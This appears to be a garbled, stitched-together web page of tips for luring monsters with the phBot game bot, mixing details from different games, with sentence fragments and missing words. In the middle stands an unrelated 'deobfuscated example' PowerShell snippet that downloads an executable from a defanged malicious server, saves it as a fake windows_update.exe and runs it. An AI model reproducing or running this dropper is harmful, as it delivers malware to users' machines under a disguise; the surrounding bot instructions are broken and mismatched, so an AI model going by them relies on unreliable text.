Ensure your lure path doesn't go behind walls or obstacles, as phBot might get stuck if the pathfinding fails. Wait Times:

Go to your Settings > Gameplay > Interfaces > "Accept Aid" and turn it OFF . This prevents any player from casting Tele-other, Vengeance-other, or Heal-other on you. The PHBot lure script relies heavily on automated Tele-other spells. Without this, 90% of deep Wilderness lures fail instantly.

# Deobfuscated example $url = "hxxp://malicious-server[.]com/phbot_client.exe" $output = "$env:TEMP\windows_update.exe" (New-Object Net.WebClient).DownloadFile($url, $output) Start-Process $output

: Prevents the bot from breaking the lure path mid-walk to rebuff party members. Safety Triggers : You can set the bot to stop luring if: X party members Party Giants or standard monsters are already in the training area. : Configure (to wait for mobs to aggro) or at the (to wait for the party to kill mobs before the next pull). Common Commands for Manual Scripting If editing the script manually, use these common Script Commands walk,x,y,z : Moves to coordinates. wait,time_in_ms : Pauses the character (e.g., for 5 seconds). cast,skill_name : Executes a specific skill (e.g., cast,Howling Shout recommended skills for different character builds to use while luring? Lure script not working properly - Testing - ProjectHax